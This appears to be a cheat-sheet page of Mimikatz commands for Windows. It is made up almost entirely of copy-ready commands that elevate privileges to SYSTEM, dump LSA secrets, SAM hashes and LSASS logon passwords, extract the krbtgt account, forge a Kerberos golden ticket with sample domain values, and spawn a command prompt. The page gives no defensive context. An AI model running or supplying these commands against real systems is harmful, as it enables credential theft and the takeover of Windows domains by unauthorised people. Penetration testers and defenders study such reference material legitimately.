Mimikatz

Mimikatz is a password dumping tool for Windows. It also manages Kerberos tickets. Kiwi is the updated version of Mimikatz.

You can download it from the GitHub repository.

Usage

mimikatz
Copied!

• Check if Mimikatz Running as an Administrator

  mimikatz # privilege::debug
  Copied!

• Elevate to SYSTEM Level

  mimikatz # token::elevate
  Copied!

• Dump Hashes

  mimikatz # lsadump::lsa /patch
  Copied!

  • Security Identifier of the Kerberos Ticket Granting Ticket Account

    mimikatz # lsadump::lsa /inject /name:krbtgt
    Copied!

  • All SAM Local Password Hashes

    mimikatz # lsadump::sam
    Copied!

  • Credentials from the LSASS Memory

    mimikatz # sekurlsa::logonpasswords
    Copied!

• Create a Kerberos Golden Ticket

  mimikatz # kerberos::golden /user:Administrator /domain:sample.domain /sid
  :S-1-5-21-849420856-2351964222-986696166 /krbtgt:7808900312cc005cf7082a9a89eb
  dfdf /id:500
  Copied!

1. Open a New Command Prompt

   mimikatz # misc::cmd